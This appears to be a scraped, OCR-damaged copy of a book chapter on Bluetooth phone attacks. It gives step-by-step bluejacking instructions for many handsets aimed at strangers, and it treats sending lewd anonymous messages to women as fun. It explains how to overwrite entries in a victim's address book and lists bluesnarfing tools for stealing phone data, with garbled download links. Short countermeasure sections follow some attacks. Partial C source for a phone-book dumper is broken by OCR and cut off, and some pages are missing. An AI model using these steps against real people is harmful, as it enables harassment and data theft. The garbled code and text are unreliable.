An Ethical Guide to Bluetooth Hacking Tutorial with latest Tools

An Ethical Guide to Bluetooth Hacking Tutorial with latest Tools

Securtiy Threats

BLUETOOTH HACKING

  • Is the sensitive data on your mobile phone(like e-mails, bank information, passwords, etc.) saafe from malicios attackers?
  • Are you receiving annoying unwarrented spam messages on your mobile phone?
  • Are the private SMS text messages that you send to your wife sage from the prying eyes of attackers?
  • Are the photographs stored on your mobile phone sage from being circulted on the Internet and mobile networks?

 

Mobile phones have become ubiquitous both in their presence and unage in this fast paced technology savvy world. Gone are the days when mobile phones were merely used as a mobile telephone device to have voice conversations with other users. Today a mobile phone has evolved into many more things – it has also become your camera, your computer, your source to connect to the Internet, yout personal organizer, your address book, your e-mail inbox and lots more. In other words, your mobile phone has started holding information that is very private and precious to both indivduals and bussinesses. This  opens up a completely new dimension of cracking known as mobile phone cracking.

Most modern day mobile phones ship with inbuilt Bluetooth capabilities. Bluetooth is nothing but a wireless communication standard that allows devices to communicate with one another within a range of 10 metres. In other words, Bluetooth is the protocol that allows Bluetooth enabled deviece to transfer files, photographs, address books and other data with one another as long as they are in range. Most mobile phone related attacks or threats invove the Bluetooth communication stanndard as some level or the other.

Hence, it is  a good idea for both crackers and even potential victims to become conversant with the Bluetooth communication standard and understand it better. Bluetooth has indeed replaced physical wires and cables at a variety of places for short range data communication purposes.

The Bluetooth communication protocol can be used to connect a variety of different Bluetooth enabled devices. It can not only be used to connect two similar Bluetooth enabled devices (like two mobile phones), but also two dissimilar Bluetooth enabled devices (like a PDA and a computer). It can also be used in conjuction with other nerwork protocols. For examples, one can use Bluetooth enaled mobile phone or PDA to connect to a computer and then use the computer to connect to the Internet. Almost all Bluetooth communication set-ups can be divied into main categories given as follows:

Master-Master Connection

 A Master-Muster Bluetooth connection set-up is one in which all the Bluetooth Connection devices that are a part of the communication channel have keyboards and can actively and dynamically communicate with one another. For example, when two mobile phones or a PDA and a computer are connected with one another, then, since both Bluetooth devices have a keyboard (or an input device) the connection is known as a Master-Master connection. In such connections, the user has the option of actively entering dara and communicating with the other Bluetooth device.

Master-Slave Connection

A Master-Slave Bluetooth connection set-up is one in which one of the devices Connection thar are a pan of the communication channel dbes not have a keyboard. For
example, the connection berween a mobile phone and a Bluetooth enabled headset can be described as a Master-Slave connection. In such a case, since a mobile phone has a keyboard, the user acrively controls the data entry and communication with the headset. On the other hand, since the Bluetooth enabled device does not have a keyboard (or input device) it relies on pre-programmed instructions and dara to carry out the communication.
Like any other protocol, even Bluetooth uses a pre-defined procedure for connection establishment. Most Bluetooth connections between any two devices ger esrablished by the following main sreps (This may not always be the case. Rcad the section on Bluetooth Security Modes later in this chapter for more details):

  1. Discovery

 Before any two Bluerooth enabled devices can start communicaring with one another. they must carry out a procedure krowrr as discovery. In other words, the two Bluetooth enabled device need to discover the pressence of one another. Typically, the discovery procedure is carried out  by a Bluetooth device by scanning for other Blurtooth devices within range.

Hacking Truth: Each bluetooth enable mobile phone device can be put into a variety of different operation modes which is explained in Table 1.1:

 

Mode Meaning
OFF Bluetooth has been turned . Your mobile phone cannot connect to any other Bluetooth device, nor can any other Bluetooth device connect or discover your mobile phone.
ON As soon as a Bluetooth communication channel is established with another device, your mobile phone’s mode is set to the ON mode.
DISCOVERABLE or SHOWN TO ALL Even though no current communication channels are active, the mobile phone is in discoverable mode and can be discovered by any other Bluetooth enabled device within a range of 10 metres.
HIDDEN Your mobile phone becomes undiscoverable by unknown devices and will respond to only those that it has been paired with.

II Pairing

 

Once the Bluetooth devices have discovered each other, then comes the next step known as pairing. The pairing process is to Bluetooth what the Transmission Control Protocol/Internet Protocol (TCP/IP) handshake is to two computers on the Internet. It allows the two Bluetooth enabled devices (that are trying to set up a communication channel with one another)

to exchange important information like addresses, version and most importantly the pairing code (consider this to be something like a password) for the connection. Only once this pairing process has been completed successfully, can the two devices start communicating with one other with proper access rights and privileges.

without the entry of the correct pairing code, the Bluetooth connection request will nor be accepted. It is important to note that in case of a Master- Master Bluetooth connection, users at both ends are required to enter the pairing code for the connection to get established. For example, when one tries to connect two mobile phones through Bluetooth, then users at both ends are required to enter a Pairing code. On the other hand, in case of a Master-Slave connection, the master user is required to enter the pairing code, while the slave automatically reads the pairing code from its pairing programmed instructions. For example, when one tries to connect a mobile phone to its headset, then the pairing code has to be entered at the mobile phone end, while it is automatically read from pre-programmed instructions at the headset end.

when users at both ends enter an identical pairing code, a link key is generated. This link key is then used to carry out the third step known as binding. It is important to note that certain devices may nor require the Pairing process for the data transfer to start. In other words, on most occasions pairing is an optional process that is usually carried our to bind connections with only those devices that one communicates regularly with. Paired devices are also easier to locate and recognize.

 

III. Binding

Once the paring codes have been exchanged by the Bluetooth enabled

devices, they dynamically generate and share an encryption key. It is this

encryption key that keeps each Bluetooth connection unique and binding.

This binding nature of a Bluetooth connection also means that a connection

established between two devices can only be used by those two devices.

No other device can interfere or snoop on the connection. In other words,

if a Bluetooth connection has been established between two mobile phones,

then a third arbitrary mobile phone (that is within range) cannot eavesdrop

and listen to the data transfer. This only means that any point of time, a

Bluetooth device should technically know all devices with which it is

communicating. At this stage, the connection between the two Bluetooth

devices is said to be established.

Hence, to recapitulate each time a device wants to establish a Bluetooth connection with another device, the following steps need to be carried out:

 

  1. Discovery: Device scans for target device and discovers it.
  2. Pairing: Devices exchanges pairing code and other information.
  3. Binding: Devices exchange encryption key and make the connection binding.

 

Hacking Truth: we just discussed a layman’s description of the three main steps that fake place when a Bluetooth connection is established. A behind the scenes look at the various steps that take place to authenticate and establish a Bluetooth connection can be depicted as following:

  1. The SOURCE Bluetooth device sends its address to the DESTINATION Bluetooth device.
  2. The DESTINATION device asks the SOURCE to answer a random challenge. The user at the SOURCE end enters the pairing code which is used to compute the link key. This link key is used by SOURCE to compute the answer to the random challenge.
  3. The DESTINATION computes a response to the random challenge that it sent to the SOURCE. The SOURCE then sends its response to DESTINATION.
  4. The DESTINATION compares its response to the response sent by SOURCE. If they match, there the Bluetooth connection is officially authorized and started.

 

The Non-secure

A Bluetooth device in the non-secure mode will not implement or follow Security Mode any security features. In this mode, most of the security features like authentication, pairing and encryption are bypassed and not enforced. For example, when one sends a business card or address book contact through Bluetooth, then the non-secure mode is enforced and no security is enforced. In other words, when one transfers a business card or address book contract through Bluetooth, then authentication, pairing and encryption are all bypassed. This particular security mode comes into play especially during Bluejacking attacks which are discussed later in this chapter.

 

The Service-Level Security Mode

A Bluetooth device in the service-level security mode will have a central security manager that controls access to services and devices. Each time a user wants to connect to such a Bluetooth device, then (he central security

manager controls and implements different security procedures for different applications. Hence, such a security arrangement makes it possible to give a particular user access to a given service, while denying access to other services. In other words, different security measures are applied for different applications and users.

 

The Link-Level security Mode

A Bluetooth device in the link-level security mode will implement and  enforce authorization and security procedures even before a communication

channel is established. In this security mode, proper authentication, Pairing and encryption procedures are implemented. Typically, in this security mode the pairing and binding steps described in the previous section are executed to set-up the communication channel.

Bluetooth has, without a doubt, revolutionized wireless communication within enabled devices. It is both widely supported and implemented. Unfortunately, like most other protocols, it continues to suffer from a number of threads, loopholes and vulnerabilities.

 

Case Studies

New York, United states of America

A young lady was sitting at a table in a Starbucks outlet located on a busy street in New York City, sipping on her favorite latte while catching up on the latest fashion tips in Cosmopolitan magazine. Suddenly she finds her mobile phone screen light up with an anonymous incoming message,

Hi Beautiful! Looking Good.

Although the lady was slightly alarmed on reading the message and irritated at finding the source number missing, she chose to ignore it and soon went back to her latte and magazine. She probably assumed that she has become a victim of yet another mere spam message campaign. However, within a few minutes her mobile phone again lit up with another anonymous incoming message,

You look real good in your blare top. Wonder how you look without it?

This very personal message caught the lady’s attention and made her sit up. She was actually wearing a blue top and suddenly she felt so unprotected. Not only did she quickly survey the people sitting around her, bur also she frantically tried to find out the source number of the received message on her mobile phone. However, after a few minutes of fidgeting with her mobile phone and one more lewd message later, the lady quickly picked up her stuff and walked out of the coffee shop. This blatant invasion of her personal privacy seared her so much that she refused to enter the coffee shop again.

 

Hong Kong

 

A successful Hong Kong based entrepreneur with interests in various sectors and regions across Asia was attending a conference on leadership skills. He was one of those people who are used to running their entire business with the mobile phone. From sending sensitive e-mails to creating proposal documents, from sending fax to making important business conference calls — he was in the habit of doing everything from the convenience of his mobile phone. His mobile phone also allowed him to attend the conference and still not miss any of his business related work. His productivity was at a completely new high. Once the conference got over, the entrepreneur went back home to find an envelope slid beneath the door of his house. when he opened the envelope he found several pages of personal information. e-mails, photographs, phone numbers and other details. It not only contained sensitive business proposals that nobody else knew about, but also contained notes that he had taken at the conference on his mobile phone. That is when he realized that maybe somebody broke into his mobile phone and stole all data from it. But is it really possible to do that or is that something taken out of fictitious movies?

 

Singapore

Every Sunday afternoon Mrs Kuok used to take her children to the local shopping mall in the Bedok area of Singapore. A few months back, during one of her such weekly shopping trips Mrs Kuok received an incoming message in the form of a business card on her mobile phone. Following her usual Practice, she immediately saved the new business card that she had received through Bluetooth on her mobile phone. When she viewed the business card it read,

HaHa. Cute Children you have.

If that was not enough to scare the lady out of her wits, she soon received yet another message along similar lines. This time she chose not to save the incoming business card and rejected it. For the next hour or so, the lady continued to receive such messages, one after the other, some of which she simply rejected, others which she actually read and got all the more horrified. Till this day, the Lady has no idea what was happening to her mobile phone on that day in the shopping mall.

 

Tokyo, Japan

Every evening a group of teenagers who go by the pseudonym of Black Avengers are known to travel by the local trains and visit the most popular shopping malls. Throughout this hobby of theirs, which takes several hours daily from their schedule – all the teenagers are busy pressing a variety of keys on their hand phones. The Black Avengers are nor the average group of teenagers that they look, but are actually experienced Bluejackers who love playing pranks with their hand phones. There are many such local rival gangs in Tokyo that compete with the Black Avengers to see who can send the maximum number of Bluejack messages to unsuspecting individuals every single day. Ever wondered what such teenagers do? what gives them the kicks? what keeps them going?

 

Types of Bluetooth Threats

There are a variety of different types of Bluetooth related threats and attacks that can be executed against unsuspecting mobile phone users.

  1. The Bluejack Attack (OBEX Push Attacks)
  2. Modifying a Remote Mobile Phone’s Address Book
  3. Bluespamming
  4. The Bluesnarf Attack (OBEX PULL Attacks)
  5. The Blue Backdoor Attack
  6. The BlueBug Attack
  7. Other Attacks

(a) Short Pairing Code

(b) Default Pairing Codes

(c) Random Challenge Response Generators

(d) Man-In-Middle Attacks

(e) Privacy Concerns

(f) Brute Force Attacks

(g) DOS Attacks

(h) Cracking the Pair codes

(i) Unit Key Attacks

(i) Impersonation Attacks

  1. Blueprinting
  2. Blue wardriving

Although most of these Bluetooth related attacks are quite new, they have already become quite common and are widely executed. We shall be discussing all these attacks in detail, in the next few sections.

 

The Bluejack Attack Have you ever received an anonymous message on your mobile phone while you were in a crowded public place like a shopping mall or a coffee shop or a library? Ever wondered from where and how you received that message?

 

Have you ever wanted to send an anonymous message to a cute girl that you just saw in your school but whose mobile phone number you don’t know? The answer to most of these questions and many others is a technique known as the bluejacking attack.

 

Bluejacking is the process of sending an anonymous message from a Bluetooth enabled phone to another, within a range of 10 meters. Not only does the recipient not know the exact source of the received message, but also bluejacking allows people to send free messages to one another without having to Pay any money to the cellular operators. Since bluejacking utilizes the Bluetooth technology present on the mobile phone handset itself (and not the operator) all messages that are sent using it are free.

 

This technique of sending anonymous free messages has become extremely popular and common in most cities around the world. It not only allows an attacker to use a Bluetooth enabled phone to send an anonymous message to the victim, but any other Bluetooth device like a laptop or a PDA can also be used for the same purpose. Often many people describe bluejacking as another form of messaging.

The best part about bluejacking (which is possible due to the Bluetooth communication standard) is that it allows an attacker to send anonymous messages to the victim. In other words, it is very difficult or almost impossible for a victim to figure out the source of a received message. Traditionally, each time a message or a file was transferred between two devices then both devices knew each other’s identity. This made it extremely easy for an attacker to trace the source of a received file or message. However, with the advent of Bluetooth, which allows the transfer of a message or a file within a radius of 10 meters in any direction, it becomes very difficult for a user to trace the received message or file to its actual source. Invariably, each time bluejacking is performed the victim tries to match the displayed name (that can be customized by the attacker) to every single person around them in a radius of 10 meters in all directions.

This attack can easily be carried out using just a Bluetooth enabled device in a crowded public place where a number of unsuspecting victims are likely to be easily found. Typically, one can carry out a Bluejack attack by simply observing the main steps (which vary slightly depending on the mobile phone that one uses) given as follows:

 

  1. Create a new address book contact on the Bluetooth enabled device. Enter the anonymous message that has to be sent to the victim in the Name field of the Address book. For example, you can write, ‘You look really beautiful in that blue dress’, as the anonymous message in the Name field.
  2. Scan for victim mobile phones that are within a range of 10 meters at that point of time. This process should not take more than 10 seconds or so and soon an entire list of names of Bluetooth enabled devices will appear on the screen. Although the name of a particular mobile phone can be changed by the user, however by default it is set to the phone model number by the manufacturer. Typically, this step is also known as discovery.
  3. Send the new address book contact that you just created to the victim mobile phone using the Bluetooth communication protocol by choosing the name from the displayed list. The victim will receive this anonymous message on his phone (the phone will beep the message tone) and will invariably react with either a startled or shocked expression!

 

Hacking Truth: We discussed the general framework of carrying out a bluejack attack on a target mobile phone in the previous section. However, just to make things a bit easier, the following are step by step guidelines to carry out a bluejack attack from a variehy4’ of different Bluetooth enabled devices:

 

Laptop/PC

  1. Launch your favorite e-mail client programmed. (In this example, we are going to use Outlook Express.)
  2. Click on the Addresses tab.

 

  1. Click on the New tab and select the New Contact option from the dropdown menu.
  2. Enter the anonymous message that you wish to send to the victim in the Name field and save f lie new contact.
  3. Right click on the new contact that you just created and select Action and then Bluetooth.
  4. Select a device from the list and double click on it to send the anonymous message to the victim. You just performed your first bluejack attack!

 

Nokia 6310 and 63101

  1. Select Options > New Contact by pressing the necessary buttons.
  2. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  3. Press OK.
  4. Go back to the new contact that you just created in the previous steps.
  5. Select Options > Via Blue tooth.
  6. The mobile phone iill now search for all Bluetooth enabled devices wit Ii in range.
  7. Choose the victim mobile phone from the list and press OK. You just performed your first bluejack attack!

 

Nokia 6600

  1. Select Names > Add Name by pressing the necessary buttons.
  2. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  3. Press Ok.
  4. Go buck to the New Contact that you just created in the previous steps,
  5. Select Details > Options > Send Business Card > Via Bluetooth.
  6. The mobile phone will now search for all Bluetooth enabled devices within range.
  7. Choose the victim mobile phone from the list and press OK. You just performed your first bluejack attack!

 

Nokia 7650

  1. Select Names > Add Name by pressing the necessary buttons.
  2. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  3. Press OK.
  4. Go back to the New Contact that you just created in the previous steps.
  5. Select Options > Send Business Card > Via Bluetooth.
  6. The mobile phone will now search /or all Bluetooth enabled devices within range,
  7. Choose the victim mobile phone from the list and press OK. You just performed your first bluejack attack!

Nokia 8910

  1. Select Names > Add Name by pressing the necessary buttons.
  2. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  3. Press OK.
  4. Go back to the new contact that you just created in the previous steps.
  5. Select Options > Send Business Card> Via Bluetooth.
  6. The mobile phone will now search for all Bluetooth enabled devices within range.
  7. Choose the victim mobile phone from the list and press
  8. You just performed your first bluejack attack!

Note: Most other Nokia models that support Bluetooth require a procedure very similar to the one described here to carry out a Bluejack attack.

                                                           

Sony Ericsson T610 I T630

  1. Select Phonebook > Add Contact by pressing the necessary buttons.
  2. Press Add in the name field.
  3. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  4. Press OK and then Save.
  5. Go back to the new contact that you just created in the previous steps.
  6. Select More > Send Contact > Via Bluetooth.
  7. 7he mobile phone will now search for all Bluetooth enabled devices within range.
  8. Choose the victim mobile phone from the list and press
  9. You just performed your first bluejack attack!

 

Sony Ericsson P900

  1. Select Contacts > New by pressing the necessary buttons.
  2. Press Add in the name field.
  3. Enter the anonymous message that you wish to send to the victim in the Last Name field. Do not

enter any phone number in the number field.

  1. Save the new contact entry.
  2. Go back to the New Contact that you just created in the previous steps.
  3. Select Contacts > Send As > Bluetooth > Done.
  4. 7he mobile phone now search for all Bluetooth enabled devices within range.
  5. Choose the victim mobile phone from the list and press Send. you just performed your first bluejack attack!

 

Motorola V500/V600/v551/v547/v555

  1. Select Phone Book > New Entry by pressing the necessary buttons.
  2. Press Add in the name field.
  3. Enter the anonymous message that you wish to send to the victim in the Name field. Do not enter any phone number in the number field.
  4. Save the new contact entry.
  5. Go back to the new contact that you just created in the previous steps and press the Info button on the handset.
  6. Select Send.> Bluetooth > Done.
  7. The mobile phone will now search for all Bluetooth enabled devices within range.
  8. Choose the victim mobile phone from the list and press Send. You just performed your first bluejack attack!

One can clearly see that executing a Bluejack attack is very simple and requires nothing but a Bluetooth enabled device and a crowded place. As soon as you send an anonymous message to the victim using Bluejacking, the victim mobile phone will beep the message tone and display a message along the following lines on the screen (except certain mobile handsets like Nokia 631oi which does not display any such warning prompt):

Contact Name has just been received by Bluetooth

OR

Business Card has just been received by Bluetooth

 

Most people immediately press the OK button on their mobile handsets and the blueiack message appears on their phone. It is important to note that the victim mobile phone user can also view all other fields (like number, last name, e-mail, etc.) of the contact entry that was sent by the attacker. Most importantly, since Bluetooth alone was used to send the message (and the operator was not involved at all) the victim will have no clue about the identity of the sender and the message remains anonymous. Hence, ideally bluejacking is a lot of fun when the attacker sends extremely personal messages like ‘Looking real good in that blue dress babe’ or something like ‘I think that top looks vey ugly on you’. The more personal the message, the more the victim gets freaked out.

Bluejacking is possible due to a small loophole in the initialization stage of the Bluetooth communication protocol. Before any two Bluetooth enabled devices can start communicating with one another, there is an initial handshake period when :he two devices exchange certain information with one another. During the handshake period one of the steps requires the device name of the initiating Bluetooth device to be displayed on the target Bluetooth device screen. At this step it is possible for the initiating device to send a user defined field (maximum 248 characters) to the target device. It is exactly this field that is used by Bluejacking to send the anonymous message to the target mobile phone. This attack is sometimes also known as the OBEX push attack since it allows attackers to push data or messages to the victim’s mobile phone.

 

Hacking Truth: The OBEX or Object Exchange protocol is the tie facto protocol used by most wireless devices to exchange data with one another. This protocol runs over both TCP/IP and Bluetooth and is used to exchange files, pictures, business cards, calendar entries and various other types of data between wireless devices. The Bluetooth communication standard extensively uses OBEX for communication and transfer purposes. Since Bluejacking is a form of an attack wherein a Bluetooth message (business card to be precise) is sent or pushed onto the victim mobile phone device, it is also sometimes known as the OBEX push attack.

 

Bluejacking does not remove or modify any data stored on the victim’s mobile phone. Although Bluejacking cannot cause any permanent damage to a mobile phone, it can definitely get extremely irritating and disruptive for the victim mobile phone user. Hence, on most occasions, Bluejacking proves to be more of a fun attack (usually to scare people or to flirt with people) than a malicious one. Another limiting factor related to such attacks is the fact that they can be executed only when both the Bluetooth enabled devices are within 1o meters of one another. Nonetheless Bluejacking is an excellent specimen attack that allows us to better understand other attacks that we shall discuss later in the book.

 

One malicious use of Bluejacking can possibly be to fool unsuspecting individuals into believing spam messages. For example, an attacker can send the following message to an unsuspecting victim:

 

You have just won the ABC Jackpot of 10,000 dollars. Dial 1800-234-

567-102.

 

If the victim were to actually believe this message and dial the mentioned number (many people do) then invariably the number will turn out to be a premium rate number that will charge an exorbitant amount to the victim’s mobile phone. Such Bluejacking messages can easily cause indirect malicious harm to the victim.

The widespread popularity of bluejacking soon led to the development of another technique known as bluetoothing, which can be described as the use of Bluetooth messaging as a medium for hidden meetings or socially frowned upon activities. There are entire websites devoted to organizing Bluetoothing activities in different parts of the world. Another very popular variant of blueiacking is an instant messaging client-server model known as bluechatting. Such a Bluetooth based chatting system is commonly used in crowded public places where people are likely to be within a 1o meter radius of one another.

 

Hacking Truth: we have already seen how the Object Exchange or OBEX protocol can be used to carry out a variety of different kind of attacks. It is interesting to note that the same procedure is also used by the Nokia n-Gage mobile phones to allow users to play multiplayer 8ames over a short distance.

 

Modifying a Remote Mobile Phone’s Address Book  Bluejacking can also be used to modify existing entries made in the victim

 mobile phone’s address book or contact list. If one were to create a new

address book contact having a common name like Home or Work or Honey or any other name (that is same as an entry already existing in the victim’s

address book) and send it to the victim, then it will replace the existing entry. In other words, in order to replace or modify the victim mobile Phone user’s address book, one needs to do the following steps:

  1. Create a new address book entry having the same name as that of a contact: entry that already exists in the victim’s address book. For example, the victim’s girlfriend’s name or mother’s name or best friend’s name and so on. If you do not know of an entry that already exists in the victim’s address book, then common names like Work or Home can always be used.
  2. Send this newly created address book entry to the victim mobile phone through Bluetooth.
  3. As soon as the victim accepts the Bluetooth message, it shall replace the already existing entry in the address book with the new information like phone number, e-mail address, etc.

Most people rely on their mobile phone so much that they might find it very difficult to deduce the original phone number or original e-mail address that an attacker replaces using the above steps. On certain occasions, such an attack can also be used to carry out impersonation and spoofing.

Hacking Truth: Have you wondered what name shows up when your mobile phone is discovered by your friend? Ever wanted to change the name of your mobile phone, that is used to send or receive a file through Bluetooth? One can easily change the name of their mobile phone by following the below steps (Please note that these instructions are valid on most Nokia phones. Other mobile phones will have a very similar procedure):

  1. Select the menu button to browse to the Bluetooth menu > Blue tooth Settings.
  2. Select the My Phone’s Name option and set it to any name of your choice! It is this name that will be displayed when some other device discovers your mobile phone or communicates with it.

 

Fadia’s Hot Picks  for Popular  Bluejacking Tools Although Bluejacking is extremely easy to execute manually from most Bluetooth enabled devices including mobile phones, laptops and PDAs, there are certainly a few tools that can be used to make life of a Bluejacker a lot easier. Some of them are as follows:

  1. Utility Name: Free jack

Features: Bluejacking tool written in JAVA.

Download URL: http://wwvisoItware I 3.co.uk/freejack/

 

Countermeasures Blue jacking is probably one of the easiest and most commonly executed mobile phone related attack. Hence, it has become extremely important for mobile phone users across the globe to be prepared with some effective countermeasures.

  1. One of the most effective countermeasures against Bluejacking is to simply disable Bluetooth on your mobile phone by going into options. Unfortunately, this would also mean that you will no longer be able to use any Bluetooth enabled accessories or devices with your mobile phone.
  2. However, a more practical countermeasure is to configure your Bluetooth settings and put your phone in the Undiscoverable or Hidden mode. Once you have paired your mobile phone with any Bluetooth enabled devices or accessories that you want to use it with, then you can set its options to the Undiscoverable mode or hidden mode. This will ensure that when the attacker (who is not in the allowed list) searches for Bluetooth devices, your mobile phone will not show up. At the same time one can continue using Bluetooth on their phone to connect to other devices. Based on your mobile phone manufacturer, the following steps can be followed to put your phone in the Undiscoverable mode:

 

Nokia 6310 or 6310i or 6600 or 7650 or 8910 or most other models

  1. Select the Menu button to browse to the Bluetooth menu > Bluetooth Settings.
  2. Select the My Phone’s Visibility option and set it to the Hidden mode.
  3. Especially when one is in a crowded public place one’s level of alertness should only increase. When one receives the warning prompt that a

 

new contact or business card has been received, one can prevent bluejacking by simply not accepting that incoming message.

  1. It is also a very good idea to change the name that it displays to other Bluetooth devices. If one retains the default name then it makes it easier for attackers to find specified private information about your phone like manufacturer, version etc. Moreover, it allows an attacker to easily identify whether your phone is vulnerable or not.
  2. There is no permanent solution that a user san implement to counter Bluejacking without the help of the mobile phone handset manufacturers.

Bluespamming we have already seen how bluejacking can be used to send anonymous messages to Bluetooth enabled devices within a range of 10 meters in any direction. This concept can easily be slightly modified and be used for other malicious purposes like sending spam messages to all Bluetooth enabled devices within range. This technique of sending spam messages to devices using Bluetooth is known as Bluespamming. Many proof-of-concept tools have already been developed for educational purposes to demonstrate such an attack. A number of advertisers, musicians and political parties have even started using such spam messages to propagate and market their product, work or ideas amongst the mas. Such attacks are especially very successful when carried our in crowded places like stations, airports, trains, shopping malls, restaurants, conference halls, political rallies, concerts, schools and so on.

The BlueSnarf Most mobile phone users have a variety of sensitive data stored on their Attack handsets, starting from sensitive address book contact information to personal

photographs, from private messages to business cards and so on. An even larger number of people continue to make the assumption that the data stored on their mobile phone is completely safe and secure from the malicious eyes of the outside world. Unfortunately, that is not at al true. It is indeed possible for a malicious attacker to connect to a victim’s mobile Phone and gain illegal access to all sensitive data on it.

Bluesnarfing is the process of connecting w vulnerable mobile phones through Bluetooth, without the knowledge of the victim and gaining illicit access to sensitive data on it. If your mobile phone has Bluetooth on it then chances are that even you are vulnerable to such Bluesnarf attacks. If an attacker is within 10 meters and has the right tools, then he can easily break into the victim’s mobile phone and steal all data stored on it. In the previous section we discussed how it is possible for an attacker to push anonymous messages or data onto the victim’s mobile phone using OBEX push. Bluesnarfing can be described as the complete opposite – it is an attack wherein the attacker is able to steal sensitive data from a vulnerable mobile phone using OBEX pull. In other words, since this attack involves the use of the OBEX protocol to forcibly pull sensitive data out of the victims mobile phone, it is also known as the OBEX pull attack.

Many Nokia. Sony and Ericsson handsets are vulnerable to such anonymous data pull attacks. The extent of vulnerability and damage possible through such Bluesnarfing attacks generally depends on the type of implementation of Bluetooth being used by the target mobile phone. Such bluesnarfing attacks can be executed by simply following the steps given here:

  1. This attack requires the attacker to use a J2ME enabled mobile phone as the attack tool.
  2. with your J2ME enabled phone in hand, go to a crowded public place or within 10 meters of the victim mobile phone user
  3. Once you are within range of the target mobile phone. use any of the tools described later in this section (like Blooover, Redsnarf, Bluesnarf and others) to break into the target mobile phone. It is possible to steal any of the following sensitive data or carry our any of the below activities:

. Address Book

Photographs

  • Music

. Videos

  • Calendar
  • International Mobile Equipment Identity (IMEI)
  • Clock

. Business Card Information

. Properties

. writing Address Book Entries

. Reading/Decoding SMs Messages

. Setting Call Forwards

. Initiating a New Phone Call to a pre-defined number

. Most other local data.

Some of the most interesting malicious activities that one can carry out on a snarfed mobile phone are reading/decoding a SMS message, making a phone call to a pre-defined number (For example, a premium rate number) and accessing the address book of the victim.

Fadia’s Hot Picks for Popular Bluesnarfing Tools Bluesnarfing attacks can easily be executed with the help of several proof. for Popular of-concept tools, namely

 

  1. Utility Name: Blooover

Features: Blooover is supposed to be a mobile phone security audit tool that run on J2ME phones. It can also be used to pull sensitive data from vulnerable handheld devices that are within it range. It is one ol the best tools related to Bluejacking available. It can also be used to carry out the BlueBug attack.

Download URL hrtp:llwwwtrifinite.org

  1. Utility Name: Redsnarf

Feature: Redsnarf can be used to gain illicit access to vulnerable mobile phones without the knowledge of the victim. It can then be used to steal sensitive data stored on the victims mobile phone.

Download URL hup//wwibtatstake.org

  1. Utiiity Name: Bluesnarfer

Features: Another variant tool that allow Bluesnarfing.

Download URL http//www.alighien.ortjtools/bluesnader.tar.gz

  1. Utility Name: Bluetooth Phone Book Dumper

Features: Steals phone book from various mobile phone (including

Nokia 6310i and a few Ericsson phones).

Source Code:

  • btxml.c
  • Creates a backup of the Nokia 6310i via Bluetooth. Outputs data to
  • stdout in xml format. this is plug’n’play no need to enter any data on the hosr or phone tide.
  • Just saw that it somehow works for Eriesson T610 and T611, too.

They

  • don’t support text mode sms… 🙁

Copyright (C) 2oo4 by Andreas Oberritter <obi@software.de>

 

* This program is free software; you can redistribute it and/or modify

* it under the terms of the GNU General Public License as published

by

* the Free Software Foundation; either version 2 of the License, or

* (at your option) any later version.

*

*This program is distributed in the hope that it will be useful,

* but WITHOUT ANY WARRANTY; without even the implied

warranty of

* MERCHANTABILITY or FITNESS FOR A PARTICULAR

PURPOSE. See

* the GNU General Public License for more details.

*

* You should have received a copy of the GNU General Public License

* along with this program; if not, write to the Free Software

*Foundation. Inc.. 675 Mass Aye, Cambridge, MA 02139, USA.

* rev 0.3 (2004/02/14)

* – ATEO to disable echo on ericsson

*

* rev 0.2 (2004/02/14)

* – set auth & encrypt to off

*

* rev 0.1 (2004/02/12)

* – initial release

*

* TODO: pdu parser for sms

*/

#define _GNU_SOURCE

#include <errno.h>

#include <fcntl.h>

#include <stdarg.h>

#nclude <stdbool.h>

 #include <stdio.h>

#includc <stdlib.h>

#include <string.h>

#include <sys/ioctl.h>

#include <sys/socket.h>

#include <termios.h>

 #include <time.h>

#include <unistd.h>

#include <bluetooth/bluetooth.h>

#include <bluetooth/hci.h>

#include <bluetoothlhci_lib.h>

#include <bluetooth/rfcomm.h>

 

 

 

/ ****************************************************/

#dcfine CACHE_TIMEOUT 60

#define CACHE_SIZE_MAx Ox 10000

struct cache_item {

Bdaddr_t addr,

time_t time:

bool valid:

};

static enum {

MANUF_UNKNOWN,

MANUF_ERICSSON,

MANUF_NOKIA,

) manuf;

statie struct cache_item cache[CACHE_SIZE_MAX]:

static size_t cache_size;

/ ****************************************************/

 

static void bt_cache_add(bdaddr_t *addr)

{

struct cache_item *item;

for (item = &cache[o]; item < &cache[CACHE_SIZE_MAXj;

 item++) {

if (item->valid)

Continue;

bacpy(&item->addr, addr);

item->time = time(NULL);

item->valid = true;

cache_size+ +:

}

}

/ ****************************************************/

 

static void bt_cache.clear(void)

{

struct cache_item*item;

time_t now;

size-t removed = 0;

size-t count = 0;

now = time(NULL):

for (item = &cache[0]; item < &cache[CACHE_SIZE-MAX];

 item++) {

if (count = = cache_size)

Break;

if (!item->valid)

continue;

count++;

if (now –  item->time < CACHE-TIMEOUT)

Continue;

item->valid = false:

removed+ +:

}

cache_size -= removed;

}

/ **********************************************************/

 

static bool bt_cache_find(bdaddr_t *addr)

{

struct cache_item*item;

size-t count = 0;

for (item = &cache[0]; item < &cache[CACHE-SIZE_MAx];

 item++) {

if (count = = eache_size)

Break;

if (!item->valid)

Continue;

if (!bacmp(&item->addr, addr))

return true;

count + +;

}

 

 

Page24 to 37 not down

 

 

 

 

Countermeasures

 Bluesnarfing is probably one of the most dangerous mobile phone related threats because it opens the victim’s private and sensitive data to exploitation. However, it is Possible to protect your mobile phone against such attacks by simply following the below steps:

  1. One of the most effective countermeasures against Bluesnarfing is to simply disable Bluetooth on your mobile phone by going into options. Unfortunately, this would also mean that one can no longer use Bluetooth for legitimate purposes with other devices.
  2. However, a more practical countermeasure is to configure your Bluetooth settings and put your phone in the Undiscoverable mode. Once you have Paired your mobile Phone with any Bluetooth enabled devices or accessories that you want to use it with, then you can ser its options to the Undiscoverable mode or hidden mode. This will ensure that when the attacker (who is not there in allowed list) searches for Bluetooth devices, your mobile Phone will not show up. At the same time one can continue using Bluetooth on the phone to connect to other devices. Please see the Bluejacking countermeasures to get specific instructions based on your mobile phone manufacturer.
